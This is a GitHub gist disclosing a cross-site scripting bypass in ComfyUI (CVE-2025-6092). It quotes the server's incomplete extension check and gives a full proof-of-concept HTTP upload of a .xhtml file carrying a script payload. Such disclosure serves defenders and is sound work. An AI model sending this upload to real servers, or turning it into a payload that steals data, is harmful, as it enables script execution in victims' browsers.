Skip to content

Instantly share code, notes, and snippets.

@superboy-zjc

superboy-zjc/comfyui-xss.md

Last active June 18, 2025 01:48
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save superboy-zjc/96f0d56da584d840ba18355cbea96ac4 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save superboy-zjc/96f0d56da584d840ba18355cbea96ac4 to your computer and use it in GitHub Desktop.
Download ZIP
ComfyUI is Vulnerable to Cross Site Scripting Vulnerability
Raw
comfyui-xss.md

Summary

ComfyUI is vulnerable to Cross Site Scripting vulnerability. Attackers can exploit the vulnerability by uploading .svg, .xhtml, etc., files containing the trigerable javascript payloads, which bypasses the patch for CVE-2024-10099.

  • Status: Assigned
  • CVE: CVE-2025-6092

Root Cause

The security check added for CVE-2024-10099 only fixes the content type render for the .html, .htm, .js, .css file extensions, yet the patch is not sufficient and there are many other extensions modern browsers support the execution of javascript code.

# https://github.com/comfyanonymous/ComfyUI/blob/97f23b81f3421255ec4b425d2d8f4841207e0cd8/server.py#L481
    ...
    file_extension = os.path.splitext(filename)[1].lower()
    if file_extension in {'.html', '.htm', '.js', '.css'}:
        content_type = 'application/octet-stream'  # Forces download

    return web.FileResponse(
        file,
        headers={
            "Content-Disposition": f"filename=\"{filename}\"",
            "Content-Type": content_type
        }
    )
    ...

Proof of Concept

POST /upload/image HTTP/1.1
Host: proof-of-concept:8188
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: csrftoken=N8r6yhMfrAdq3OmDn7P0x0xdrZ5ZrkQk
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Connection: keep-alive
Content-Length: 564

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="image"; filename="poc.xhtml"
Content-Type: image/jpeg

<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1);console.log('bypassed')</a:script>
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="type"

output
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="overwrite"

true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="subfolder"


------WebKitFormBoundary7MA4YWxkTrZu0gW--

comfyUI-xss

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment